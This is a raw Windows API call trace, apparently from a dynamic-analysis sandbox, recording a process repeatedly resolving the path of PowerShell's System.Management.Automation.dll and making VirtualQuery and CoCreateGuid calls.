	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.262] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.262] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.263] VirtualQuery (in: lpAddress=0x12bca0, lpBuffer=0x12cb60, dwLength=0x30 | out: lpBuffer=0x12cb60*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.263] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.264] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.264] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.264] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.264] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.264] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.264] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.265] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.265] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4036854e, Data2=0xff80, Data3=0x43ba, Data4=([0]=0xa8, [1]=0x5f, [2]=0xd5, [3]=0x5f, [4]=0x6, [5]=0x3, [6]=0x44, [7]=0xc0))) returned 0x0
	[0288.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.265] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.265] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.266] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.266] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.266] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.266] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.266] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12b960, lpBuffer=0x12c820, dwLength=0x30 | out: lpBuffer=0x12c820*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.267] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.268] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.268] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.268] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.268] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc69eacab, Data2=0xe7f5, Data3=0x4dba, Data4=([0]=0xb6, [1]=0xa5, [2]=0xe6, [3]=0x86, [4]=0x22, [5]=0x1d, [6]=0xe6, [7]=0x5f))) returned 0x0
	[0288.268] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4ba360b4, Data2=0xff43, Data3=0x446e, Data4=([0]=0x91, [1]=0xd0, [2]=0x79, [3]=0xb5, [4]=0xe0, [5]=0x3b, [6]=0xe2, [7]=0xcf))) returned 0x0
	[0288.268] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x39235e8e, Data2=0x239b, Data3=0x43b7, Data4=([0]=0x90, [1]=0x36, [2]=0x6b, [3]=0x11, [4]=0xfb, [5]=0x65, [6]=0xdb, [7]=0x25))) returned 0x0
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x1f5a3b87, Data2=0xbdf3, Data3=0x42d9, Data4=([0]=0xb4, [1]=0x6, [2]=0x7e, [3]=0x2f, [4]=0x51, [5]=0xbc, [6]=0x68, [7]=0x70))) returned 0x0
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.271] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x5b76e273, Data2=0xec7f, Data3=0x420e, Data4=([0]=0x88, [1]=0x18, [2]=0x9, [3]=0x63, [4]=0x2c, [5]=0xda, [6]=0x29, [7]=0x28))) returned 0x0
	[0288.271] VirtualQuery (in: lpAddress=0x12ba70, lpBuffer=0x12c930, dwLength=0x30 | out: lpBuffer=0x12c930*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.271] VirtualQuery (in: lpAddress=0x12bb00, lpBuffer=0x12c9c0, dwLength=0x30 | out: lpBuffer=0x12c9c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
